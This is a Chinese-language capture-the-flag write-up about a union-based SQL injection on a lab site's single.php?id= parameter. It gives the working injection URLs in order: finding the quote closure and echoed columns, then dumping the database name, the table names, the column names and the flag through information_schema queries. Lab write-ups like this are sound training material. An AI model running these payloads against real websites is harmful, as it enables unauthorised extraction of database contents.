目录
首先寻找注入点
爆数据库
爆表名
爆列名
爆数据得到flag
题目告诉我们,漏洞是在single.php路径下面。
于是我们首先就需要找到single.php路径。
首先寻找注入点
在url里输入single.php,就发现了这个网页。
下一步,就在url里手工sql注入,随便输入一些’ “)(符号,发现有没有sql注入漏洞。
输入
http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com//single.php?id=1' 发现出现了报错。这个时候,就很开心,看来找对地方了。
分析报错发现 ' '1'' '多了一个引号,所以这个闭合为’。
接下来我们就可以构造SQL语句了。
输入
http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com/single.php?id=-1' union select 1,2,3,4,5,6,7,8,9 --+
发现2,4可能有回显。
接下来试试
http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com/single.php?id=-1' union select 1,database(),3,database(),5,6,7,8,9 --+
发现果然2和4有回显,并且数据库名为ctf。
注意:2和4回显的位置都可以爆出数据。
爆数据库
http://eci-2zegk6aa9xtn2h5dmgs6.cloudeci1.ichunqiu.com/single.php?id=-1' union select 1,database(),3,4,5,6,7,8,9 --+
得到数据库名为ctf。
爆表名
http://eci-2ze7odmph63e3dwuzrpb.cloudeci1.ichunqiu.com//single.php?id=-1' union select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() --+
所有的表名titles,page_hits,membership_userpermissions,membership_groups,blog_categories,membership_userrecords,membership_users,editors_choice,blogs,links,flag,banner_posts,membership_grouppermissions,visitor_info
得到了所有的表名,关键表名为flag。
爆列名
http://eci-2zegk6aa9xtn2h5dmgs6.cloudeci1.ichunqiu.com/single.php?id=-1' union select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name='flag' --+
发现列名也是flag。
知道了列名之后,我们就可以爆数据得到flag了
http://eci-2zegk6aa9xtn2h5dmgs6.cloudeci1.ichunqiu.com/single.php?id=-1' union select 1,flag,3,4,5,6,7,8,9 from flag --+